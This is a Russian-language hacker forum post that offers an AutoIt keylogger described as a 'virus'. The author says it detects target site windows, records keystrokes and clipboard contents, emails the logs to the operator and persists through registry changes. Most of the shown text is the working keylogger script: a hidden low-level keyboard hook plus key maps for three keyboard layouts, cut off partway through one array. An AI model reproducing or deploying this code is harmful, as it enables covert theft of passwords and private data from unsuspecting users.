1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Keyloger Detektors Site (by SwAp)

Тема в разделе "Разное", создана пользователем SeOqsss, 11 фев 2012.

  1. SeOqsss
    SeOqsss Новичок
    Симпатии:
    2
    Доброго времени суток!
    В данной теме приведу пример кейлогера наскриптовом языке Autoit Keyloger Detektors Site v1.0 by SwAp.
    Данный кейлогер будет писать логи только при открытие определённых страниц сайтов,в принципе он тупа ловит заголовки активных окон,ищет в них определённые слова и еслинаходит запускает запись в лог файл,по истечению определённого вами времени,он останавливает запись лога,отправляет лог файл на почту и снова начинает читать заголовки активных окон в поиске нужных слов.
    Я так думаю всё остальное будет лишним,ведь в рельности не так то уж и интрересно будет читать переписку Феди с Ваней,или ещё кого либо,самое главное логи и логи от каких нить ресурсов с которых можно что то взять,все остальное ни к чему и именно по этому этот кейлогер будет стартовать только когда поймает нужный заголовок,тем самым будет писать только то что нужно.
    Всё просто до безобразие и самое главное работает))
    Данный кейлогер настроен под чуть 20 сайтов,ну список сайтов можно увеличить,в коментарии к самому скрипту будет описано как это сделать,если что всё же будет не понятно,можете смело задавать вопросы ниже.
    И так сами скрипыт не много раскоментированны так что думаю если вы будете внимательно смотреть в них то всё будет понятно.
    1 скрипт это сам кейлогер который пишет нажатые клавиши в лог файл wincl.au3
    Код:
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;  [#[ Keyloger Site detektors 1.0 beta ® by SwAp Specially for TheHackWorld.iN ©]#]  ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    ; Данный вирус был написан специально для пользователей нашего нового ресурса посвященного теме безопасности в сети интернет TheHackWorld.iN
    ;Вирус состоит из трёх скриптов:
    ;stisx.au3 - скрипт который собирает не много информации о такчке на которой он запущен и детектит заголовки активных оконо и при нахождение нужного окна запускает сам кейлогер который пишет лог
    ;после ждёт некоротый промежуток времени(который вы укажите),останавливает работу кейлогера и отправляет отчет на почтовый ящик который вы укажите,после весь процесс повторяется.
    ;wincl.au3 - скрипт по сути является самим кейлогером,пишет символы в файл лога
    ;alsol.au3 - скрипт носитель,является носителем двух пред идущих скриптов,при запуске его он устанавливает пред идущие скрипты и запускает stisx.au3,так же вносит некоторые изменения в системе
    ;то есть правит пару ключей реестра и создаёт правило которое то и запускает наш кейлогер при каждом входе в систему.
    ;По сути все скрипты написаны предельно просто и будут просто замечательным (на мой взгляд) вирусом который можно сделать самому не зная ни какого языка программирования.
    ;                                                                          SwAp Specially for TheHackWorld.iN ©
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    #NoTrayIcon
    #include <Misc.au3>
    #include <inet.au3>
    #include <Date.au3>
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    ;Данный скрипт по сути кейлогер,который будет вписывать нажатые клавиши в файл лога,его не трогаем вообще,здесь всё вроде норм.
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    Global $hStub_KeyProc = DllCallbackRegister("_Key_Proc", "int", "int;ptr;ptr")
    Global $hMod = DllCall("kernel32.dll", "hwnd", "GetModuleHandle", "ptr", 0)
    Global $hHook = DllCall("user32.dll", "hwnd", "SetWindowsHookEx", "int", $WH_KEYBOARD_LL, _
        "ptr", DllCallbackGetPtr($hStub_KeyProc), "hwnd", $hMod[0], "dword", 0)
        $log = @WindowsDir & "\swnc\"&@UserName&"-log.sft"
    $date=_Now()
    $bak = ClipGet()
    filesetattrib ( @scriptname, "+h")
    FileOpen($log, 1)
    _OnStart()
    
    While 1
        Sleep(100)
    WEnd
    
    Func _EvaluateKey_Proc($nKeyCode)
        Local $sChar
    ;~ MsgBox(64,Chr($nKeyCode), $nKeyCode, 1) ;с помощью этого узнаем код нужной нам клавиши (только без shift, а то будет зависание)
    
        Switch $nKeyCode
          Case 37 To 40, 160 To 162, 219 To 222, 65 To 93, 48 To 57, 186 To 192, 96 to 105,111,109,107,106,13,32,8,9,110,20,27,46,255
    
                Switch _WinGetKeyboardLayout(WinGetHandle('[Active]'))
                    Case 0409 ;Если раскладка английская
                        If _IsPressed(10) Then ; если нажата клавиша Shift
                            $sChar=_ReplaceKeyCode_Proc($nKeyCode, $aCapture_Codes, $aEngShift_Codes)
                        Else ; если не нажата клавиша Shift
                            $sChar=_ReplaceKeyCode_Proc($nKeyCode, $aCapture_Codes, $aEng_Codes)
                        EndIf
                        ;FileWrite($log, "<font color=green style=font-size:13px>{En}</font>");можно раскаментировать строку и после\перед каждым символом будет выводится раскладка.
                    Case 0419 ;Если расскладка русская
                        If _IsPressed(10) Then ; если нажата клавиша Shift
                            $sChar=_ReplaceKeyCode_Proc($nKeyCode, $aCapture_Codes, $aRusShift_Codes)
                        Else ; если не нажата клавиша Shift
                            $sChar=_ReplaceKeyCode_Proc($nKeyCode, $aCapture_Codes, $aRus_Codes)
                        EndIf
                      ; FileWrite($log, "<font color=green style=font-size:13px>{Ru}</font>");можно раскаментировать строку и после\перед каждым символом будет выводится раскладка.
                    Case 0422 ;Если расскладка украинская
                        If _IsPressed(10) Then ; если нажата клавиша Shift
                            $sChar=_ReplaceKeyCode_Proc($nKeyCode, $aCapture_Codes, $aUkrShift_Codes)
                        Else ; если не нажата клавиша Shift
                            $sChar=_ReplaceKeyCode_Proc($nKeyCode, $aCapture_Codes, $aUkr_Codes)
                        EndIf
                ; FileWrite($log, "<font color=green style=font-size:13px>{UK}</font>");можно раскаментировать строку и после\перед каждым символом будет выводится раскладка.
                EndSwitch
                FileWrite($log, $sChar)
          Case Else ; если была нажата не буква и не цыфра, то выход из функции
            FileWrite($log, "<font color=#ff0000 style=font-size:15px> #ХЗ №: "& $nKeyCode&" # </font>")
                Return
        EndSwitch
    EndFunc
    
    Func _Key_Proc($nCode, $wParam, $lParam)
        Local $aRet, $KEYHOOKSTRUCT
    
        If $nCode < 0 Then
            $aRet = DllCall("user32.dll", "long", "CallNextHookEx", "hwnd", $hHook[0], "int", $nCode, "ptr", $wParam, "ptr", $lParam)
            Return $aRet[0]
        EndIf
    
        If $wParam = 256 Then
            $KEYHOOKSTRUCT = DllStructCreate("dword;dword;dword;dword;ptr", $lParam)
            _EvaluateKey_Proc(DllStructGetData($KEYHOOKSTRUCT, 1))
        EndIf
    
        $aRet = DllCall("user32.dll", "long", "CallNextHookEx", "hwnd", $hHook[0], "int", $nCode, "ptr", $wParam, "ptr", $lParam)
        Return $aRet[0]
    EndFunc
    
    ;Функция для замены кодов нажатых клавиш с массива
    Func _ReplaceKeyCode_Proc($nKeyCode, $aSearch_Array, $aReplace_Array)
        For $i = 1 To $aSearch_Array[0]
            If $nKeyCode==$aSearch_Array[$i]Then
                Return $aReplace_Array[$i]
            EndIf
        Next
    EndFunc
    
    ;функция позволяет узнать язык текущей расскладки клавиатуры
    Func _WinGetKeyboardLayout($hWnd)
    $hWnd = WinGetHandle(WinActive(""))
        Local $aRet = DllCall("user32.dll", "long", "GetWindowThreadProcessId", "hwnd", $hWnd, "ptr", 0)
        $aRet = DllCall("user32.dll", "long", "GetKeyboardLayout", "long", $aRet[0])
    
        Return "0000" & Hex($aRet[0], 4)
    EndFunc
     
    func _OnStart()
    Global $aEng_Codes[81]
    $aEng_Codes[0]=80 ;общее количество активных ячеек в массиве
    $aEng_Codes[1]="`"
    $aEng_Codes[2]="q"
    $aEng_Codes[3]="w"
    $aEng_Codes[4]="e"
    $aEng_Codes[5]="r"
    $aEng_Codes[6]="t"
    $aEng_Codes[7]="y"
    $aEng_Codes[8]="u"
    $aEng_Codes[9]="i"
    $aEng_Codes[10]="o"
    $aEng_Codes[11]="p"
    $aEng_Codes[12]="["
    $aEng_Codes[13]="]"
    $aEng_Codes[14]="a"
    $aEng_Codes[15]="s"
    $aEng_Codes[16]="d"
    $aEng_Codes[17]="f"
    $aEng_Codes[18]="g"
    $aEng_Codes[19]="h"
    $aEng_Codes[20]="j"
    $aEng_Codes[21]="k"
    $aEng_Codes[22]="l"
    $aEng_Codes[23]=";"
    $aEng_Codes[24]="'"
    $aEng_Codes[25]="z"
    $aEng_Codes[26]="x"
    $aEng_Codes[27]="c"
    $aEng_Codes[28]="v"
    $aEng_Codes[29]="b"
    $aEng_Codes[30]="n"
    $aEng_Codes[31]="m"
    $aEng_Codes[32]=","
    $aEng_Codes[33]="."
    $aEng_Codes[34]="/"
    $aEng_Codes[35]="1"
    $aEng_Codes[36]="2"
    $aEng_Codes[37]="3"
    $aEng_Codes[38]="4"
    $aEng_Codes[39]="5"
    $aEng_Codes[40]="6"
    $aEng_Codes[41]="7"
    $aEng_Codes[42]="8"
    $aEng_Codes[43]="9"
    $aEng_Codes[44]="0"
    $aEng_Codes[45]="-"
    $aEng_Codes[46]="="
    $aEng_Codes[47]="*"
    $aEng_Codes[48]='<font color=#00ffff style=font-size:14px>(Enter) Time: '&$date& ' Bufer: '&$bak&'</font><br>'
    $aEng_Codes[49]=" "
    $aEng_Codes[50]='0'
    $aEng_Codes[51]="1"
    $aEng_Codes[52]="2"
    $aEng_Codes[53]="3"
    $aEng_Codes[54]="4"
    $aEng_Codes[55]="5"
    $aEng_Codes[56]="6"
    $aEng_Codes[57]="7"
    $aEng_Codes[58]="8"
    $aEng_Codes[59]="9"
    $aEng_Codes[60]="/"
    $aEng_Codes[61]="-"
    $aEng_Codes[62]="+"
    $aEng_Codes[63]="{Shift L}"
    $aEng_Codes[64]="{'\'}"
    $aEng_Codes[65]="{'backspace'}"
    $aEng_Codes[66]="{CTRL}"
    $aEng_Codes[67]="{Shift R}"
    $aEng_Codes[68]="{Win L}"
    $aEng_Codes[69]="{Win R}"
    $aEng_Codes[70]="{Contecst menu}"
    $aEng_Codes[71]="{'ESC'}"
    $aEng_Codes[72]="{Caps Lock}"
    $aEng_Codes[73]="{Del else ','}"
    $aEng_Codes[74]="{'Delete'}"
    $aEng_Codes[75]="{'NumLock'}"
    $aEng_Codes[76]="{'Tab'}"
    $aEng_Codes[77]="{'^'}"
    $aEng_Codes[78]="{'>'}"
    $aEng_Codes[79]="{'v'}"
    $aEng_Codes[80]="{'<'}"
    
    Global $aEngShift_Codes[81]
    $aEngShift_Codes[0]=80
    $aEngShift_Codes[1]="~"
    $aEngShift_Codes[2]="Q"
    $aEngShift_Codes[3]="W"
    $aEngShift_Codes[4]="E"
    $aEngShift_Codes[5]="R"
    $aEngShift_Codes[6]="T"
    $aEngShift_Codes[7]="Y"
    $aEngShift_Codes[8]="U"
    $aEngShift_Codes[9]="I"
    $aEngShift_Codes[10]="O"
    $aEngShift_Codes[11]="P"
    $aEngShift_Codes[12]="{"
    $aEngShift_Codes[13]="}"
    $aEngShift_Codes[14]="A"
    $aEngShift_Codes[15]="S"
    $aEngShift_Codes[16]="D"
    $aEngShift_Codes[17]="F"
    $aEngShift_Codes[18]="G"
    $aEngShift_Codes[19]="H"
    $aEngShift_Codes[20]="J"
    $aEngShift_Codes[21]="K"
    $aEngShift_Codes[22]="L"
    $aEngShift_Codes[23]=":"
    $aEngShift_Codes[24]='"'
    $aEngShift_Codes[25]="Z"
    $aEngShift_Codes[26]="X"
    $aEngShift_Codes[27]="C"
    $aEngShift_Codes[28]="V"
    $aEngShift_Codes[29]="B"
    $aEngShift_Codes[30]="N"
    $aEngShift_Codes[31]="M"
    $aEngShift_Codes[32]="<"
    $aEngShift_Codes[33]=">"
    $aEngShift_Codes[34]="?"
    $aEngShift_Codes[35]="!"
    $aEngShift_Codes[36]="@"
    $aEngShift_Codes[37]="#"
    $aEngShift_Codes[38]="$"
    $aEngShift_Codes[39]="%"
    $aEngShift_Codes[40]="^"
    $aEngShift_Codes[41]="&"
    $aEngShift_Codes[42]="*"
    $aEngShift_Codes[43]="("
    $aEngShift_Codes[44]=")"
    $aEngShift_Codes[45]="_"
    $aEngShift_Codes[46]="+"
    $aEngShift_Codes[47]="*"
    $aEngShift_Codes[48]='<font color=#00ffff style=font-size:14px>(Enter) Time: '&$date& ' Bufer: '&$bak&'</font><br>'
    $aEngShift_Codes[49]=" "
    $aEngShift_Codes[50]='0'
    $aEngShift_Codes[51]="1"
    $aEngShift_Codes[52]="2"
    $aEngShift_Codes[53]="3"
    $aEngShift_Codes[54]="4"
    $aEngShift_Codes[55]="5"
    $aEngShift_Codes[56]="6"
    $aEngShift_Codes[57]="7"
    $aEngShift_Codes[58]="8"
    $aEngShift_Codes[59]="9"
    $aEngShift_Codes[60]="/"
    $aEngShift_Codes[61]="-"
    $aEngShift_Codes[62]="+"
    $aEngShift_Codes[63]="{Shift L}"
    $aEngShift_Codes[64]="{|}"
    $aEngShift_Codes[65]="{'backspace'}"
    $aEngShift_Codes[66]="{CTRL}"
    $aEngShift_Codes[67]="{Shift R}"
    $aEngShift_Codes[68]="{Win L}"
    $aEngShift_Codes[69]="{Win R}"
    $aEngShift_Codes[70]="{Contecst menu}"
    $aEngShift_Codes[71]="{'ESC'}"
    $aEngShift_Codes[72]="{Caps Lock}"
    $aEngShift_Codes[73]="{'Del'}"
    $aEngShift_Codes[74]="{'Delete'}"
    $aEngShift_Codes[75]="{'NumLock'}"
    $aEngShift_Codes[76]="{'Tab'}"
    $aEngShift_Codes[77]="{'^'}"
    $aEngShift_Codes[78]="{'>'}"
    $aEngShift_Codes[79]="{'v'}"
    $aEngShift_Codes[80]="{'<'}"
    
    Global $aRus_Codes[81]
    $aRus_Codes[0]=80
    $aRus_Codes[1]="ё"
    $aRus_Codes[2]="й"
    $aRus_Codes[3]="ц"
    $aRus_Codes[4]="у"
    $aRus_Codes[5]="к"
    $aRus_Codes[6]="е"
    $aRus_Codes[7]="н"
    $aRus_Codes[8]="г"
    $aRus_Codes[9]="ш"
    $aRus_Codes[10]="щ"
    $aRus_Codes[11]="з"
    $aRus_Codes[12]="х"
    $aRus_Codes[13]="ъ"
    $aRus_Codes[14]="ф"
    $aRus_Codes[15]="ы"
    $aRus_Codes[16]="в"
    $aRus_Codes[17]="а"
    $aRus_Codes[18]="п"
    $aRus_Codes[19]="р"
    $aRus_Codes[20]="о"
    $aRus_Codes[21]="л"
    $aRus_Codes[22]="д"
    $aRus_Codes[23]="ж"
    $aRus_Codes[24]="э"
    $aRus_Codes[25]="я"
    $aRus_Codes[26]="ч"
    $aRus_Codes[27]="с"
    $aRus_Codes[28]="м"
    $aRus_Codes[29]="и"
    $aRus_Codes[30]="т"
    $aRus_Codes[31]="ь"
    $aRus_Codes[32]="б"
    $aRus_Codes[33]="ю"
    $aRus_Codes[34]="."
    $aRus_Codes[35]="1"
    $aRus_Codes[36]="2"
    $aRus_Codes[37]="3"
    $aRus_Codes[38]="4"
    $aRus_Codes[39]="5"
    $aRus_Codes[40]="6"
    $aRus_Codes[41]="7"
    $aRus_Codes[42]="8"
    $aRus_Codes[43]="9"
    $aRus_Codes[44]="0"
    $aRus_Codes[45]="-"
    $aRus_Codes[46]="="
    $aRus_Codes[47]="*"
    $aRus_Codes[48]='<font color=#00ffff style=font-size:14px>(Enter) Time: '&$date& ' Bufer: '&$bak&'</font><br>'
    $aRus_Codes[49]=" "
    $aRus_Codes[50]='0'
    $aRus_Codes[51]="1"
    $aRus_Codes[52]="2"
    $aRus_Codes[53]="3"
    $aRus_Codes[54]="4"
    $aRus_Codes[55]="5"
    $aRus_Codes[56]="6"
    $aRus_Codes[57]="7"
    $aRus_Codes[58]="8"
    $aRus_Codes[59]="9"
    $aRus_Codes[60]="/"
    $aRus_Codes[61]="-"
    $aRus_Codes[62]="+"
    $aRus_Codes[63]="{Shift L}"
    $aRus_Codes[64]="{'\'}"
    $aRus_Codes[65]="{'backspace'}"
    $aRus_Codes[66]="{CTRL}"
    $aRus_Codes[67]="{Shift R}"
    $aRus_Codes[68]="{Win L}"
    $aRus_Codes[69]="{Win R}"
    $aRus_Codes[70]="{Contecst menu}"
    $aRus_Codes[71]="{'ESC'}"
    $aRus_Codes[72]="{Caps Lock}"
    $aRus_Codes[73]="{, else Del}"
    $aRus_Codes[74]="{'Delete'}"
    $aRus_Codes[75]="{'NumLock'}"
    $aRus_Codes[76]="{'Tab'}"
    $aRus_Codes[77]="{'^'}"
    $aRus_Codes[78]="{'>'}"
    $aRus_Codes[79]="{'v'}"
    $aRus_Codes[80]="{'<'}"
    
    Global $aRusShift_Codes[81]
    $aRusShift_Codes[0]=80
    $aRusShift_Codes[1]="Ё"
    $aRusShift_Codes[2]="Й"
    $aRusShift_Codes[3]="Ц"
    $aRusShift_Codes[4]="У"
    $aRusShift_Codes[5]="К"
    $aRusShift_Codes[6]="Е"
    $aRusShift_Codes[7]="Н"
    $aRusShift_Codes[8]="Г"
    $aRusShift_Codes[9]="Ш"
    $aRusShift_Codes[10]="Щ"
    $aRusShift_Codes[11]="З"
    $aRusShift_Codes[12]="Х"
    $aRusShift_Codes[13]="Ъ"
    $aRusShift_Codes[14]="Ф"
    $aRusShift_Codes[15]="Ы"
    $aRusShift_Codes[16]="В"
    $aRusShift_Codes[17]="А"
    $aRusShift_Codes[18]="П"
    $aRusShift_Codes[19]="Р"
    $aRusShift_Codes[20]="О"
    $aRusShift_Codes[21]="Л"
    $aRusShift_Codes[22]="Д"
    $aRusShift_Codes[23]="Ж"
    $aRusShift_Codes[24]="Э"
    $aRusShift_Codes[25]="Я"
    $aRusShift_Codes[26]="Ч"
    $aRusShift_Codes[27]="С"
    $aRusShift_Codes[28]="М"
    $aRusShift_Codes[29]="И"
    $aRusShift_Codes[30]="Т"
    $aRusShift_Codes[31]="Ь"
    $aRusShift_Codes[32]="Б"
    $aRusShift_Codes[33]="Ю"
    $aRusShift_Codes[34]=","
    $aRusShift_Codes[35]="!"
    $aRusShift_Codes[36]='"'
    $aRusShift_Codes[37]="№"
    $aRusShift_Codes[38]=";"
    $aRusShift_Codes[39]="%"
    $aRusShift_Codes[40]=":"
    $aRusShift_Codes[41]="?"
    $aRusShift_Codes[42]="*"
    $aRusShift_Codes[43]="("
    $aRusShift_Codes[44]=")"
    $aRusShift_Codes[45]="_"
    $aRusShift_Codes[46]="+"
    $aRusShift_Codes[47]="*"
    $aRusShift_Codes[48]='<font color=#00ffff style=font-size:14px>(Enter) Time: '&$date& ' Bufer: '&$bak&'</font><br>'
    $aRusShift_Codes[49]=" "
    $aRusShift_Codes[50]='0'
    $aRusShift_Codes[51]="1"
    $aRusShift_Codes[52]="2"
    $aRusShift_Codes[53]="3"
    $aRusShift_Codes[54]="4"
    $aRusShift_Codes[55]="5"
    $aRusShift_Codes[56]="6"
    $aRusShift_Codes[57]="7"
    $aRusShift_Codes[58]="8"
    $aRusShift_Codes[59]="9"
    $aRusShift_Codes[60]="/"
    $aRusShift_Codes[61]="-"
    $aRusShift_Codes[62]="+"
    $aRusShift_Codes[63]="{Shift L}"
    $aRusShift_Codes[64]="{/}"
    $aRusShift_Codes[65]="{'backspace'}"
    $aRusShift_Codes[66]="{CTRL}"
    $aRusShift_Codes[67]="{Shift R}"
    $aRusShift_Codes[68]="{Win L}"
    $aRusShift_Codes[69]="{Win R}"
    $aRusShift_Codes[70]="{Contecst menu}"
    $aRusShift_Codes[71]="{'ESC'}"
    $aRusShift_Codes[72]="{Caps Lock}"
    $aRusShift_Codes[73]="{'Del'}"
    $aRusShift_Codes[74]="{'Delete'}"
    $aRusShift_Codes[75]="{'NumLock'}"
    $aRusShift_Codes[76]="{'Tab'}"
    $aRusShift_Codes[77]="{'^'}"
    $aRusShift_Codes[78]="{'>'}"
    $aRusShift_Codes[79]="{'v'}"
    $aRusShift_Codes[80]="{'<'}"
    
    Global $aUkr_Codes[81]
    $aUkr_Codes[0]=80
    $aUkr_Codes[1]="'"
    $aUkr_Codes[2]="й"
    $aUkr_Codes[3]="ц"
    $aUkr_Codes[4]="у"
    $aUkr_Codes[5]="к"
    $aUkr_Codes[6]="е"
    $aUkr_Codes[7]="я"
    $aUkr_Codes[8]="г"
    $aUkr_Codes[9]="ш"
    $aUkr_Codes[10]="щ"
    $aUkr_Codes[11]="з"
    $aUkr_Codes[12]="х"
    $aUkr_Codes[13]="ї"
    $aUkr_Codes[14]="ф"
    $aUkr_Codes[15]="і"
    $aUkr_Codes[16]="в"
    $aUkr_Codes[17]="а"
    $aUkr_Codes[18]="п"
    $aUkr_Codes[19]="р"
    $aUkr_Codes[20]="о"
    $aUkr_Codes[21]="л"
    $aUkr_Codes[22]="д"
    $aUkr_Codes[23]="ж"
    $aUkr_Codes[24]="є"
    $aUkr_Codes[25]="н"
    $aUkr_Codes[26]="ч"
    $aUkr_Codes[27]="с"
    $aUkr_Codes[28]="м"
    $aUkr_Codes[29]="и"
    $aUkr_Codes[30]="т"
    $aUkr_Codes[31]="ь"
    $aUkr_Codes[32]="б"
    $aUkr_Codes[33]="ю"
    $aUkr_Codes[34]="."
    $aUkr_Codes[35]="1"
    $aUkr_Codes[36]="2"
    $aUkr_Codes[37]="3"
    $aUkr_Codes[38]="4"
    $aUkr_Codes[39]="5"
    $aUkr_Codes[40]="6"
    $aUkr_Codes[41]="7"
    $aUkr_Codes[42]="8"
    $aUkr_Codes[43]="9"
    $aUkr_Codes[44]="0"
    $aUkr_Codes[45]="-"
    $aUkr_Codes[46]="="
    $aUkr_Codes[47]="*"
    $aUkr_Codes[48]='<font color=#00ffff style=font-size:14px>(Enter) Time: '&$date& ' Bufer: '&$bak&'</font><br>'
    $aUkr_Codes[49]=" "
    $aUkr_Codes[50]='0'
    $aUkr_Codes[51]="1"
    $aUkr_Codes[52]="2"
    $aUkr_Codes[53]="3"
    $aUkr_Codes[54]="4"
    $aUkr_Codes[55]="5"
    $aUkr_Codes[56]="6"
    $aUkr_Codes[57]="7"
    $aUkr_Codes[58]="8"
    $aUkr_Codes[59]="9"
    $aUkr_Codes[60]="/"
    $aUkr_Codes[61]="-"
    $aUkr_Codes[62]="+"
    $aUkr_Codes[63]="{Shift L}"
    $aUkr_Codes[64]="{'\'}"
    $aUkr_Codes[65]="{'backspace'}"
    $aUkr_Codes[66]="{CTRL}"
    $aUkr_Codes[67]="{Shift R}"
    $aUkr_Codes[68]="{Win L}"
    $aUkr_Codes[69]="{Win R}"
    $aUkr_Codes[70]="{Contecst menu}"
    $aUkr_Codes[71]="{'ESC'}"
    $aUkr_Codes[72]="{Caps Lock}"
    $aUkr_Codes[73]="{Del else ','}"
    $aUkr_Codes[74]="{'Delete'}"
    $aUkr_Codes[75]="{'NumLock'}"
    $aUkr_Codes[76]="{'Tab'}"
    $aUkr_Codes[77]="{'^'}"
    $aUkr_Codes[78]="{'>'}"
    $aUkr_Codes[79]="{'v'}"
    $aUkr_Codes[80]="{'<'}"
    
    Global $aUkrShift_Codes[81]
    $aUkrShift_Codes[0]=80
    $aUkrShift_Codes[1]="’"
    $aUkrShift_Codes[2]="Й"
    $aUkrShift_Codes[3]="Ц"
    $aUkrShift_Codes[4]="У"
    $aUkrShift_Codes[5]="К"
    $aUkrShift_Codes[6]="Е"
    $aUkrShift_Codes[7]="Я"
    $aUkrShift_Codes[8]="Г"
    $aUkrShift_Codes[9]="Ш"
    $aUkrShift_Codes[10]="Щ"
    $aUkrShift_Codes[11]="З"
    $aUkrShift_Codes[12]="Х"
    $aUkrShift_Codes[13]="Ї"
    $aUkrShift_Codes[14]="Ф"
    $aUkrShift_Codes[15]="І"
    $aUkrShift_Codes[16]="В"
    $aUkrShift_Codes[17]="А"
    $aUkrShift_Codes[18]="П"
    $aUkrShift_Codes[19]="Р"
    $aUkrShift_Codes[20]="О"
    $aUkrShift_Codes[21]="Л"
    $aUkrShift_Codes[22]="Д"
    $aUkrShift_Codes[23]="Ж"
    $aUkrShift_Codes[24]="Є"
    $aUkrShift_Codes[25]="Н"
    $aUkrShift_Codes[26]="Ч"
    $aUkrShift_Codes[27]="С"
    $aUkrShift_Codes[28]="М"
    $aUkrShift_Codes[29]="И"
    $aUkrShift_Codes[30]="Т"
    $aUkrShift_Codes[31]="Ь"
    $aUkrShift_Codes[32]="Б"
    $aUkrShift_Codes[33]="Ю"
    $aUkrShift_Codes[34]=","
    $aUkrShift_Codes[35]="!"
    $aUkrShift_Codes[36]='"'
    $aUkrShift_Codes[37]="№"
    $aUkrShift_Codes[38]=";"
    $aUkrShift_Codes[39]="%"
    $aUkrShift_Codes[40]=":"
    $aUkrShift_Codes[41]="?"
    $aUkrShift_Codes[42]="*"
    $aUkrShift_Codes[43]="("
    $aUkrShift_Codes[44]=")"
    $aUkrShift_Codes[45]="_"
    $aUkrShift_Codes[46]="+"
    $aUkrShift_Codes[47]="*"
    $aUkrShift_Codes[48]='<font color=#00ffff style=font-size:14px>(Enter) Time: '&$date& ' Bufer: '&$bak&'</font><br>'
    $aUkrShift_Codes[49]=" "
    $aUkrShift_Codes[50]='0'
    $aUkrShift_Codes[51]="1"
    $aUkrShift_Codes[52]="2"
    $aUkrShift_Codes[53]="3"
    $aUkrShift_Codes[54]="4"
    $aUkrShift_Codes[55]="5"
    $aUkrShift_Codes[56]="6"
    $aUkrShift_Codes[57]="7"
    $aUkrShift_Codes[58]="8"
    $aUkrShift_Codes[59]="9"
    $aUkrShift_Codes[60]="/"
    $aUkrShift_Codes[61]="-"
    $aUkrShift_Codes[62]="+"
    $aUkrShift_Codes[63]="{Shift L}"
    $aUkrShift_Codes[64]="{/ else |}"
    $aUkrShift_Codes[65]="{'backspace'}"
    $aUkrShift_Codes[66]="{CTRL}"
    $aUkrShift_Codes[67]="{Shift R}"
    $aUkrShift_Codes[68]="{Win L}"
    $aUkrShift_Codes[69]="{Win R}"
    $aUkrShift_Codes[70]="{Contecst menu}"
    $aUkrShift_Codes[71]="{'ESC'}"
    $aUkrShift_Codes[72]="{Caps Lock}"
    $aUkrShift_Codes[73]="{'Del'}"
    $aUkrShift_Codes[74]="{'Delete'}"
    $aUkrShift_Codes[75]="{'NumLock'}"
    $aUkrShift_Codes[76]="{'Tab'}"
    $aUkrShift_Codes[77]="{'^'}"
    $aUkrShift_Codes[78]="{'>'}"
    $aUkrShift_Codes[79]="{'v'}"
    $aUkrShift_Codes[80]="{'<'}"
    
    Global $aCapture_Codes[81]
    $aCapture_Codes[0]=80 ;общее кол. акт. ячеек массива
    $aCapture_Codes[1]=192
    $aCapture_Codes[2]=81
    $aCapture_Codes[3]=87
    $aCapture_Codes[4]=69
    $aCapture_Codes[5]=82
    $aCapture_Codes[6]=84
    $aCapture_Codes[7]=89
    $aCapture_Codes[8]=85
    $aCapture_Codes[9]=73
    $aCapture_Codes[10]=79
    $aCapture_Codes[11]=80
    $aCapture_Codes[12]=219
    $aCapture_Codes[13]=221
    $aCapture_Codes[14]=65
    $aCapture_Codes[15]=83
    $aCapture_Codes[16]=68
    $aCapture_Codes[17]=70
    $aCapture_Codes[18]=71
    $aCapture_Codes[19]=72
    $aCapture_Codes[20]=74
    $aCapture_Codes[21]=75
    $aCapture_Codes[22]=76
    $aCapture_Codes[23]=186
    $aCapture_Codes[24]=222
    $aCapture_Codes[25]=90
    $aCapture_Codes[26]=88
    $aCapture_Codes[27]=67
    $aCapture_Codes[28]=86
    $aCapture_Codes[29]=66
    $aCapture_Codes[30]=78
    $aCapture_Codes[31]=77
    $aCapture_Codes[32]=188
    $aCapture_Codes[33]=190
    $aCapture_Codes[34]=191
    $aCapture_Codes[35]=49
    $aCapture_Codes[36]=50
    $aCapture_Codes[37]=51
    $aCapture_Codes[38]=52
    $aCapture_Codes[39]=53
    $aCapture_Codes[40]=54
    $aCapture_Codes[41]=55
    $aCapture_Codes[42]=56
    $aCapture_Codes[43]=57
    $aCapture_Codes[44]=48
    $aCapture_Codes[45]=189
    $aCapture_Codes[46]=187
    $aCapture_Codes[47]=106 ;* на цифровой клавиатуре
    $aCapture_Codes[48]=13 ;Код клавиши Enter
    $aCapture_Codes[49]=32
    $aCapture_Codes[50]=96
    $aCapture_Codes[51]=97
    $aCapture_Codes[52]=98
    $aCapture_Codes[53]=99
    $aCapture_Codes[54]=100
    $aCapture_Codes[55]=101
    $aCapture_Codes[56]=102
    $aCapture_Codes[57]=103
    $aCapture_Codes[58]=104
    $aCapture_Codes[59]=105
    $aCapture_Codes[60]=111
    $aCapture_Codes[61]=109
    $aCapture_Codes[62]=107
    $aCapture_Codes[63]=160 ; добавляем с 63 позиции
    $aCapture_Codes[64]=220
    $aCapture_Codes[65]=8
    $aCapture_Codes[66]=162 ;* на цифровой клавиатуре
    $aCapture_Codes[67]=161 ;Код клавиши Enter
    $aCapture_Codes[68]=91
    $aCapture_Codes[69]=92
    $aCapture_Codes[70]=93
    $aCapture_Codes[71]=27
    $aCapture_Codes[72]=20
    $aCapture_Codes[73]=110
    $aCapture_Codes[74]=46
    $aCapture_Codes[75]=255
    $aCapture_Codes[76]=9
    $aCapture_Codes[77]=38
    $aCapture_Codes[78]=39
